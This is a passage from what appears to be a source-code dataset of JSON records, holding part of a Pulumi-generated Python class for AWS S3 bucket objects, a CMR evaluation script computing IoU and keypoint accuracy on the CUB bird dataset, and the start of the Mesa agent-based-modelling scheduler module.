= None,\n object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,\n object_lock_mode: Optional[pulumi.Input[str]] = None,\n object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,\n server_side_encryption: Optional[pulumi.Input[str]] = None,\n source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,\n source_hash: Optional[pulumi.Input[str]] = None,\n storage_class: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n website_redirect: Optional[pulumi.Input[str]] = None,\n __props__=None):\n if opts is None:\n opts = pulumi.ResourceOptions()\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError('Expected resource options to be a ResourceOptions instance')\n if opts.version is None:\n opts.version = _utilities.get_version()\n if opts.id is None:\n if __props__ is not None:\n raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')\n __props__ = BucketObjectArgs.__new__(BucketObjectArgs)\n\n 
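# The assignments below copy each constructor argument into the generated\n            # BucketObjectArgs property bag; the deprecated bucket and key inputs emit\n            # DeprecationWarnings first, and the output-only tags_all and version_id\n            # fields start out as None.\n            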
__props__.__dict__[\"acl\"] = acl\n if bucket is None and not opts.urn:\n raise TypeError(\"Missing required property 'bucket'\")\n if bucket is not None and not opts.urn:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"bucket is deprecated: Use the aws_s3_object resource instead\"\"\")\n __props__.__dict__[\"bucket\"] = bucket\n __props__.__dict__[\"bucket_key_enabled\"] = bucket_key_enabled\n __props__.__dict__[\"cache_control\"] = cache_control\n __props__.__dict__[\"content\"] = content\n __props__.__dict__[\"content_base64\"] = content_base64\n __props__.__dict__[\"content_disposition\"] = content_disposition\n __props__.__dict__[\"content_encoding\"] = content_encoding\n __props__.__dict__[\"content_language\"] = content_language\n __props__.__dict__[\"content_type\"] = content_type\n __props__.__dict__[\"etag\"] = etag\n __props__.__dict__[\"force_destroy\"] = force_destroy\n if key is not None and not opts.urn:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"key is deprecated: Use the aws_s3_object resource instead\"\"\")\n __props__.__dict__[\"key\"] = key\n __props__.__dict__[\"kms_key_id\"] = kms_key_id\n __props__.__dict__[\"metadata\"] = metadata\n __props__.__dict__[\"object_lock_legal_hold_status\"] = object_lock_legal_hold_status\n __props__.__dict__[\"object_lock_mode\"] = object_lock_mode\n __props__.__dict__[\"object_lock_retain_until_date\"] = object_lock_retain_until_date\n __props__.__dict__[\"server_side_encryption\"] = server_side_encryption\n __props__.__dict__[\"source\"] = source\n __props__.__dict__[\"source_hash\"] = source_hash\n __props__.__dict__[\"storage_class\"] = storage_class\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"website_redirect\"] = website_redirect\n __props__.__dict__[\"tags_all\"] = None\n __props__.__dict__[\"version_id\"] = None\n super(BucketObject, __self__).__init__(\n 'aws:s3/bucketObject:BucketObject',\n resource_name,\n __props__,\n opts)\n\n @staticmethod\n def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n acl: Optional[pulumi.Input[str]] = None,\n bucket: Optional[pulumi.Input[str]] = None,\n bucket_key_enabled: Optional[pulumi.Input[bool]] = None,\n cache_control: Optional[pulumi.Input[str]] = None,\n content: Optional[pulumi.Input[str]] = None,\n content_base64: Optional[pulumi.Input[str]] = None,\n content_disposition: Optional[pulumi.Input[str]] = None,\n content_encoding: Optional[pulumi.Input[str]] = None,\n content_language: Optional[pulumi.Input[str]] = None,\n content_type: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n force_destroy: Optional[pulumi.Input[bool]] = None,\n key: Optional[pulumi.Input[str]] = None,\n kms_key_id: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,\n object_lock_mode: Optional[pulumi.Input[str]] = None,\n object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,\n server_side_encryption: Optional[pulumi.Input[str]] = None,\n source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,\n source_hash: Optional[pulumi.Input[str]] = None,\n storage_class: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, 
pulumi.Input[str]]]] = None,\n version_id: Optional[pulumi.Input[str]] = None,\n website_redirect: Optional[pulumi.Input[str]] = None) -> 'BucketObject':\n \"\"\"\n Get an existing BucketObject resource's state with the given name, id, and optional extra\n properties used to qualify the lookup.\n\n :param str resource_name: The unique name of the resulting resource.\n :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] acl: [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n :param pulumi.Input[str] bucket: Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n :param pulumi.Input[bool] bucket_key_enabled: Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n :param pulumi.Input[str] cache_control: Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n :param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n :param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n :param pulumi.Input[str] content_disposition: Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n :param pulumi.Input[str] content_encoding: Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n :param pulumi.Input[str] content_language: Language the content is in e.g., en-US or en-GB.\n :param pulumi.Input[str] content_type: Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n :param pulumi.Input[str] etag: Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n :param pulumi.Input[bool] force_destroy: Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n :param pulumi.Input[str] key: Name of the object once it is in the bucket.\n :param pulumi.Input[str] kms_key_id: ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. 
If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n :param pulumi.Input[str] object_lock_legal_hold_status: [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n :param pulumi.Input[str] object_lock_mode: Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n :param pulumi.Input[str] object_lock_retain_until_date: Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n :param pulumi.Input[str] server_side_encryption: Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n :param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: Path to a file that will be read and uploaded as raw bytes for the object content.\n :param pulumi.Input[str] source_hash: Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n :param pulumi.Input[str] storage_class: [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Map of tags to assign to the object. 
If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: Map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.\n :param pulumi.Input[str] version_id: Unique version ID value for the object, if bucket versioning is enabled.\n :param pulumi.Input[str] website_redirect: Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _BucketObjectState.__new__(_BucketObjectState)\n\n __props__.__dict__[\"acl\"] = acl\n __props__.__dict__[\"bucket\"] = bucket\n __props__.__dict__[\"bucket_key_enabled\"] = bucket_key_enabled\n __props__.__dict__[\"cache_control\"] = cache_control\n __props__.__dict__[\"content\"] = content\n __props__.__dict__[\"content_base64\"] = content_base64\n __props__.__dict__[\"content_disposition\"] = content_disposition\n __props__.__dict__[\"content_encoding\"] = content_encoding\n __props__.__dict__[\"content_language\"] = content_language\n __props__.__dict__[\"content_type\"] = content_type\n __props__.__dict__[\"etag\"] = etag\n __props__.__dict__[\"force_destroy\"] = force_destroy\n __props__.__dict__[\"key\"] = key\n __props__.__dict__[\"kms_key_id\"] = kms_key_id\n __props__.__dict__[\"metadata\"] = metadata\n __props__.__dict__[\"object_lock_legal_hold_status\"] = object_lock_legal_hold_status\n __props__.__dict__[\"object_lock_mode\"] = object_lock_mode\n __props__.__dict__[\"object_lock_retain_until_date\"] = object_lock_retain_until_date\n __props__.__dict__[\"server_side_encryption\"] = server_side_encryption\n __props__.__dict__[\"source\"] = source\n __props__.__dict__[\"source_hash\"] = source_hash\n __props__.__dict__[\"storage_class\"] = storage_class\n __props__.__dict__[\"tags\"] = tags\n __props__.__dict__[\"tags_all\"] = tags_all\n __props__.__dict__[\"version_id\"] = version_id\n __props__.__dict__[\"website_redirect\"] = website_redirect\n return BucketObject(resource_name, opts=opts, __props__=__props__)\n\n @property\n @pulumi.getter\n def acl(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n \"\"\"\n return pulumi.get(self, \"acl\")\n\n @property\n @pulumi.getter\n def bucket(self) -> pulumi.Output[str]:\n \"\"\"\n Name of the bucket to put the file in. 
Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n \"\"\"\n return pulumi.get(self, \"bucket\")\n\n @property\n @pulumi.getter(name=\"bucketKeyEnabled\")\n def bucket_key_enabled(self) -> pulumi.Output[bool]:\n \"\"\"\n Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n \"\"\"\n return pulumi.get(self, \"bucket_key_enabled\")\n\n @property\n @pulumi.getter(name=\"cacheControl\")\n def cache_control(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n \"\"\"\n return pulumi.get(self, \"cache_control\")\n\n @property\n @pulumi.getter\n def content(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n \"\"\"\n return pulumi.get(self, \"content\")\n\n @property\n @pulumi.getter(name=\"contentBase64\")\n def content_base64(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n \"\"\"\n return pulumi.get(self, \"content_base64\")\n\n @property\n @pulumi.getter(name=\"contentDisposition\")\n def content_disposition(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n \"\"\"\n return pulumi.get(self, \"content_disposition\")\n\n @property\n @pulumi.getter(name=\"contentEncoding\")\n def content_encoding(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n \"\"\"\n return pulumi.get(self, \"content_encoding\")\n\n @property\n @pulumi.getter(name=\"contentLanguage\")\n def content_language(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Language the content is in e.g., en-US or en-GB.\n \"\"\"\n return pulumi.get(self, \"content_language\")\n\n @property\n @pulumi.getter(name=\"contentType\")\n def content_type(self) -> pulumi.Output[str]:\n \"\"\"\n Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n \"\"\"\n return pulumi.get(self, \"content_type\")\n\n @property\n @pulumi.getter\n def etag(self) -> pulumi.Output[str]:\n \"\"\"\n Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n \"\"\"\n return pulumi.get(self, \"etag\")\n\n @property\n @pulumi.getter(name=\"forceDestroy\")\n def force_destroy(self) -> pulumi.Output[Optional[bool]]:\n \"\"\"\n Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. 
This value should be set to `true` only if the bucket has S3 object lock enabled.\n \"\"\"\n return pulumi.get(self, \"force_destroy\")\n\n @property\n @pulumi.getter\n def key(self) -> pulumi.Output[str]:\n \"\"\"\n Name of the object once it is in the bucket.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @property\n @pulumi.getter(name=\"kmsKeyId\")\n def kms_key_id(self) -> pulumi.Output[str]:\n \"\"\"\n ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n \"\"\"\n return pulumi.get(self, \"kms_key_id\")\n\n @property\n @pulumi.getter\n def metadata(self) -> pulumi.Output[Optional[Mapping[str, str]]]:\n \"\"\"\n Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n \"\"\"\n return pulumi.get(self, \"metadata\")\n\n @property\n @pulumi.getter(name=\"objectLockLegalHoldStatus\")\n def object_lock_legal_hold_status(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n \"\"\"\n return pulumi.get(self, \"object_lock_legal_hold_status\")\n\n @property\n @pulumi.getter(name=\"objectLockMode\")\n def object_lock_mode(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n \"\"\"\n return pulumi.get(self, \"object_lock_mode\")\n\n @property\n @pulumi.getter(name=\"objectLockRetainUntilDate\")\n def object_lock_retain_until_date(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n \"\"\"\n return pulumi.get(self, \"object_lock_retain_until_date\")\n\n @property\n @pulumi.getter(name=\"serverSideEncryption\")\n def server_side_encryption(self) -> pulumi.Output[str]:\n \"\"\"\n Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n \"\"\"\n return pulumi.get(self, \"server_side_encryption\")\n\n @property\n @pulumi.getter\n def source(self) -> pulumi.Output[Optional[Union[pulumi.Asset, pulumi.Archive]]]:\n \"\"\"\n Path to a file that will be read and uploaded as raw bytes for the object content.\n \"\"\"\n return pulumi.get(self, \"source\")\n\n @property\n @pulumi.getter(name=\"sourceHash\")\n def source_hash(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. 
(The value is only stored in state and not saved by AWS.)\n \"\"\"\n return pulumi.get(self, \"source_hash\")\n\n @property\n @pulumi.getter(name=\"storageClass\")\n def storage_class(self) -> pulumi.Output[str]:\n \"\"\"\n [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n \"\"\"\n return pulumi.get(self, \"storage_class\")\n\n @property\n @pulumi.getter\n def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:\n \"\"\"\n Map of tags to assign to the object. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n \"\"\"\n return pulumi.get(self, \"tags\")\n\n @property\n @pulumi.getter(name=\"tagsAll\")\n def tags_all(self) -> pulumi.Output[Mapping[str, str]]:\n \"\"\"\n Map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.\n \"\"\"\n return pulumi.get(self, \"tags_all\")\n\n @property\n @pulumi.getter(name=\"versionId\")\n def version_id(self) -> pulumi.Output[str]:\n \"\"\"\n Unique version ID value for the object, if bucket versioning is enabled.\n \"\"\"\n return pulumi.get(self, \"version_id\")\n\n @property\n @pulumi.getter(name=\"websiteRedirect\")\n def website_redirect(self) -> pulumi.Output[Optional[str]]:\n \"\"\"\n Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n return pulumi.get(self, \"website_redirect\")\n\n"} {"ext": "py", "sha": "1a2f727f4d21c6fe544013e24ac6ab8313bb3b06", "content": "\"\"\"\nScript for testing on CUB.\n\nSample usage:\npython -m cmr.benchmark.evaluate --split val --name --num_train_epoch \n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import app\nfrom absl import flags\nimport os\nimport os.path as osp\nimport numpy as np\nimport torch\nimport scipy.io as sio\n\nfrom ..nnutils import test_utils\nfrom ..data import cub as cub_data\nfrom ..nnutils import predictor as pred_utils\n\nflags.DEFINE_boolean('visualize', False, 'if true visualizes things')\n\nopts = flags.FLAGS\n\n\nclass ShapeTester(test_utils.Tester):\n def define_model(self):\n opts = self.opts\n\n self.predictor = pred_utils.MeshPredictor(opts)\n\n # for visualization\n self.renderer = self.predictor.vis_rend\n self.renderer.set_bgcolor([1., 1., 1.])\n self.renderer.renderer.renderer.renderer.image_size = 512\n self.renderer.set_light_dir([0, 1, -1], 0.38)\n\n def init_dataset(self):\n opts = self.opts\n self.data_module = cub_data\n\n torch.manual_seed(0)\n self.dataloader = self.data_module.data_loader(opts)\n\n def evaluate(self, outputs, batch):\n \"\"\"\n Compute IOU and keypoint error\n \"\"\"\n opts = self.opts\n bs = opts.batch_size\n\n ## compute iou\n mask_gt = batch['mask'].view(bs, -1).numpy()\n mask_pred = outputs['mask_pred'].cpu().view(bs, -1).type_as(\n batch['mask']).numpy()\n intersection = mask_gt * mask_pred\n union = mask_gt + mask_pred - intersection\n iou = intersection.sum(1) / union.sum(1)\n\n # Compute pck\n padding_frac = opts.padding_frac\n # The [-1,1] coordinate frame in which keypoints corresponds to:\n # (1+2*padding_frac)*max_bbox_dim in image coords\n # pt_norm = 2* (pt_img - trans)/((1+2*pf)*max_bbox_dim)\n # err_pt = 2*err_img/((1+2*pf)*max_bbox_dim)\n # err_pck_norm = err_img/max_bbox_dim = err_pt*(1+2*pf)/2\n # so 
the keypoint error in the canonical fram should be multiplied by:\n err_scaling = (1 + 2 * padding_frac) / 2.0\n kps_gt = batch['kp'].cpu().numpy()\n\n kps_vis = kps_gt[:, :, 2]\n kps_gt = kps_gt[:, :, 0:2]\n kps_pred = outputs['kp_pred'].cpu().type_as(batch['kp']).numpy()\n kps_err = kps_pred - kps_gt\n kps_err = np.sqrt(np.sum(kps_err * kps_err, axis=2)) * err_scaling\n\n return iou, kps_err, kps_vis\n\n def visualize(self, outputs, batch):\n vert = outputs['verts'][0]\n cam = outputs['cam_pred'][0]\n texture = outputs['texture'][0]\n\n img_pred = self.renderer(vert, cam, texture=texture)\n aroundz = []\n aroundy = []\n # for deg in np.arange(0, 180, 30):\n for deg in np.arange(0, 150, 30):\n rendz = self.renderer.diff_vp(\n vert, cam, angle=-deg, axis=[1, 0, 0], texture=texture)\n rendy = self.renderer.diff_vp(\n vert, cam, angle=deg, axis=[0, 1, 0], texture=texture)\n aroundz.append(rendz)\n aroundy.append(rendy)\n\n aroundz = np.hstack(aroundz)\n aroundy = np.hstack(aroundy)\n vps = np.vstack((aroundz, aroundy))\n\n img = np.transpose(convert2np(batch['img'][0]), (1, 2, 0))\n import matplotlib.pyplot as plt\n plt.ion()\n fig = plt.figure(1)\n ax = fig.add_subplot(121)\n ax.imshow(img)\n ax.set_title('input')\n ax.axis('off')\n ax = fig.add_subplot(122)\n ax.imshow(img_pred)\n ax.set_title('pred_texture')\n ax.axis('off')\n plt.draw()\n\n fig = plt.figure(2)\n plt.imshow(vps)\n plt.axis('off')\n plt.draw()\n plt.pause(0.01)\n import ipdb\n ipdb.set_trace()\n\n def test(self):\n opts = self.opts\n bench_stats = {'ious': [], 'kp_errs': [], 'kp_vis': []}\n\n if opts.ignore_pred_delta_v:\n result_path = osp.join(opts.results_dir, 'results_meanshape.mat')\n elif opts.use_sfm_ms:\n result_path = osp.join(opts.results_dir,\n 'results_sfm_meanshape.mat')\n else:\n result_path = osp.join(opts.results_dir, 'results.mat')\n\n if opts.use_sfm_camera:\n result_path = result_path.replace('.mat', '_sfm_camera.mat')\n\n print('Writing to %s' % result_path)\n\n if not osp.exists(result_path):\n\n n_iter = len(self.dataloader)\n for i, batch in enumerate(self.dataloader):\n if i % 100 == 0:\n print('{}/{} evaluation iterations.'.format(i, n_iter))\n if opts.max_eval_iter > 0 and (i >= opts.max_eval_iter):\n break\n outputs = self.predictor.predict(batch)\n if opts.visualize:\n self.visualize(outputs, batch)\n iou, kp_err, kp_vis = self.evaluate(outputs, batch)\n\n bench_stats['ious'].append(iou)\n bench_stats['kp_errs'].append(kp_err)\n bench_stats['kp_vis'].append(kp_vis)\n\n if opts.save_visuals and (i % opts.visuals_freq == 0):\n self.save_current_visuals(batch, outputs)\n\n bench_stats['kp_errs'] = np.concatenate(bench_stats['kp_errs'])\n bench_stats['kp_vis'] = np.concatenate(bench_stats['kp_vis'])\n\n bench_stats['ious'] = np.concatenate(bench_stats['ious'])\n sio.savemat(result_path, bench_stats)\n else:\n bench_stats = sio.loadmat(result_path)\n\n # Report numbers.\n\n mean_iou = bench_stats['ious'].mean()\n\n n_vis_p = np.sum(bench_stats['kp_vis'], axis=0)\n n_correct_p_pt1 = np.sum(\n (bench_stats['kp_errs'] < 0.1) * bench_stats['kp_vis'], axis=0)\n n_correct_p_pt15 = np.sum(\n (bench_stats['kp_errs'] < 0.15) * bench_stats['kp_vis'], axis=0)\n pck1 = (n_correct_p_pt1 / n_vis_p).mean()\n pck15 = (n_correct_p_pt15 / n_vis_p).mean()\n print('%s mean iou %.3g, pck.1 %.3g, pck.15 %.3g' %\n (osp.basename(result_path), mean_iou, pck1, pck15))\n\n\ndef main(_):\n opts.n_data_workers = 0\n opts.batch_size = 1\n\n opts.results_dir = osp.join(opts.results_dir_base, '%s' % (opts.split),\n opts.name, 
'epoch_%d' % opts.num_train_epoch)\n if not osp.exists(opts.results_dir):\n print('writing to %s' % opts.results_dir)\n os.makedirs(opts.results_dir)\n\n torch.manual_seed(0)\n tester = ShapeTester(opts)\n tester.init_testing()\n tester.test()\n\n\nif __name__ == '__main__':\n app.run(main)\n"} {"ext": "py", "sha": "1a2f72f3f29a482fec7b6f6236c8c573a02a818b", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nMesa Time Module\n================\n\nObjects for handling the time component of a model. In particular, this module\ncontains Schedulers, which handle agent activation. A Scheduler is an object\nwhich controls when agents are called upon to act, and when.\n\nThe activation order can have a serious impact on model behavior, so it's\nimportant to specify it explicitly. Example simple activation regimes include\nactivating all agents in the same order every step, shuffling the activation\norder every time, activating each agent *on average* once per step, and more.\n\nKey concepts:\n Step: Many models advance in 'steps'. A step may involve the activation of\n all agents, or a random (or selected) subset of them. Each agent in turn\n may have their own step() method.\n\n Time: Some models may simulate a continuous 'clock' instead of discrete\n steps. However, by default, the Time is equal to the number of steps the\n model has taken.\n\n\nTODO: Have the schedulers use the model's randomizer, to keep random number\nseeds consistent and allow for replication.\n\n\"\"\"\nimport random\nfrom collections import OrderedDict\n\n\nclass BaseScheduler:\n \"\"\" Simplest scheduler; activates agents one at a time, in the order\n they were added.\n\n Assumes that each agent added has a *step* method which takes no arguments.\n\n (This is explicitly meant to replicate the scheduler in MASON).\n\n \"\"\"\n def __init__(self, model):\n \"\"\" Create a new, empty BaseScheduler. \"\"\"\n self.model = model\n self.steps = 0\n self.time = 0\n self._agents = OrderedDict()\n\n def add(self, agent):\n \"\"\" Add an Agent object to the schedule.\n\n Args:\n agent: An Agent to be added to the schedule. NOTE: The agent must\n have a step() method.\n\n \"\"\"\n self._agents[agent.unique_id] = agent\n\n def remove(self, agent):\n \"\"\" Remove all instances of a given agent from the schedule.\n\n Args:\n agent: An agent object.\n\n \"\"\"\n del self._agents[agent.unique_id]\n\n def step(self):\n \"\"\" Execute the step of all the agents, one at a time. \"\"\"\n agent_keys = list(self._agents.keys())\n for agent_key in agent_keys:\n self._agents[agent_key].step()\n self.steps += 1\n self.time += 1\n\n def get_agent_count(self):\n \"\"\" Returns the current number of agents in the queue. \"\"\"\n return len(self._agents.keys())\n\n @property\n def agents(self):\n return list(self._agents.values())\n\n\nclass RandomActivation(BaseScheduler):\n \"\"\" A scheduler which activates each agent once per step, in random order,\n with the order reshuffled every step.\n\n This is equivalent to the NetLogo 'ask agents...' 
and is generally the\n default behavior for an ABM.\n\n Assumes that all agents have a step(model) method.\n\n \"\"\"\n def step(self):\n \"\"\" Executes the step of all agents, one at a time, in\n random order.\n\n \"\"\"\n agent_keys = list(self._agents.keys())\n random.shuffle(agent_keys)\n\n for agent_key in agent_keys:\n self._agents[agent_key].step()\n self.steps += 1\n self.time += 1\n\n\nclass SimultaneousActivation(BaseScheduler):\n \"\"\" A scheduler to simulate the simultaneous activation of all the agents.\n\n This scheduler requires that each agent have two methods: step and advance.\n step() activates the agent and stages any necessary changes, but does not\n apply them yet. advance() then applies the changes.\n\n \"\"\"\n def step(self):\n \"\"\" Step all agents, then advance them. \"\"\"\n agent_keys = list(self._agents.keys())\n for agent_key in agent_keys:\n self._agents[agent_key].step()\n for agent_key in agent_keys:\n self._agents[agent_key].advance()\n self.steps += 1\n self.time += 1\n\n\nclass StagedActivation(BaseScheduler):\n \"\"\" A scheduler which allows agent activation to be divided into several\n stages instead of a single `step` method. All agents execute one stage\n before moving on to the next.\n\n Agents must have all the stage methods implemented. Stage methods take a\n model object as their only argument.\n\n This schedule tracks steps and time separately. Time advances in fractional\n increments of 1 / (# of stages), meaning that 1 step = 1 unit of time.\n\n \"\"\"\n def __init__(self, model, stage_list=None, shuffle=False,\n shuffle_between_stages=False):\n \"\"\" Create an empty Staged Activation schedule.\n\n Args:\n model: Model object associated with the schedule.\n stage_list: List of strings of names of stages to run, in the\n order to run them in.\n shuffle: If True, shuffle the order of agents each step.\n shuffle_between_stages: If True, shuffle the agents after each\n stage; otherwise, only shuffle at the start\n of each step.\n\n \"\"\"\n super().__init__(model)\n self.stage_list = [\"step\"] if not stage_list else stage_list\n self.shuffle = shuffle\n self.shuffle_between_stages = shuffle_between_stages\n self.stage_time = 1 / len(self.stage_list)\n\n def step(self):\n \"\"\" Executes all the stages for all agents. 
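Stages run in the order given by stage_list; agent order is reshuffled after\n        every stage when shuffle_between_stages is True, and self.time advances by\n        1 / len(stage_list) for each stage executed.\n        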
